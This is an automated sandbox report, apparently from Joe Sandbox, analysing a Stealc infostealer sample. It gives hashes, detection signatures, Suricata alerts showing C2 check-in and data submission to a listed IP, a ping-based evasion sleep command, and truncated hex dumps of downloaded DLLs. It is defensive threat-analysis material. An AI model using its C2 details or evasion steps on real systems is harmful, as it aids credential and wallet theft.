Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522474
MD5: 1bec0616f2e4dc133175566d1c6bd6dd
SHA1: 1db3b4a88ebc6bf86669f24020b425d0b257f48f
SHA256: 8ffc2aa27b84ed0736d57be8b45dcc56c817d404b8c4904e795dc51861d281f4
Tags: exeuser-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Avira: detection malicious, Label: TR/SelfDel.kxxob
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\seed[1].exe Avira: detection malicious, Label: TR/SelfDel.kxxob
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\seed[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe ReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\DocumentsFCFBGIDAEH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\seed[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.10.dr, freebl3[1].dll.10.dr
Source: Binary string: mozglue.pdbP source: mozglue.dll.10.dr, mozglue[1].dll.10.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.10.dr, freebl3[1].dll.10.dr
Source: Binary string: nss3.pdb@ source: nss3[1].dll.10.dr, nss3.dll.10.dr
Source: Binary string: C:\Users\Administrator\Desktop\net8.0-windows7.0\Data\src\WalletsUpdater\WalletsUpdater\obj\Release\WalletsUpdater.pdb source: DocumentsFCFBGIDAEH.exe, 00000012.00000000.2561484417.0000000000012000.00000002.00000001.01000000.0000000B.sdmp, DocumentsFCFBGIDAEH.exe.10.dr, seed[1].exe.10.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.10.dr, softokn3[1].dll.10.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.10.dr, vcruntime140[1].dll.10.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.10.dr, msvcp140.dll.10.dr
Source: Binary string: nss3.pdb source: nss3[1].dll.10.dr, nss3.dll.10.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.10.dr, mozglue[1].dll.10.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.10.dr, softokn3[1].dll.10.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\87551\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\87551 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49737 -> 62.204.41.159:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49737 -> 62.204.41.159:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 62.204.41.159:80 -> 192.168.2.4:49737
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49737 -> 62.204.41.159:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 62.204.41.159:80 -> 192.168.2.4:49737
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49737 -> 62.204.41.159:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49737 -> 62.204.41.159:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:20 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 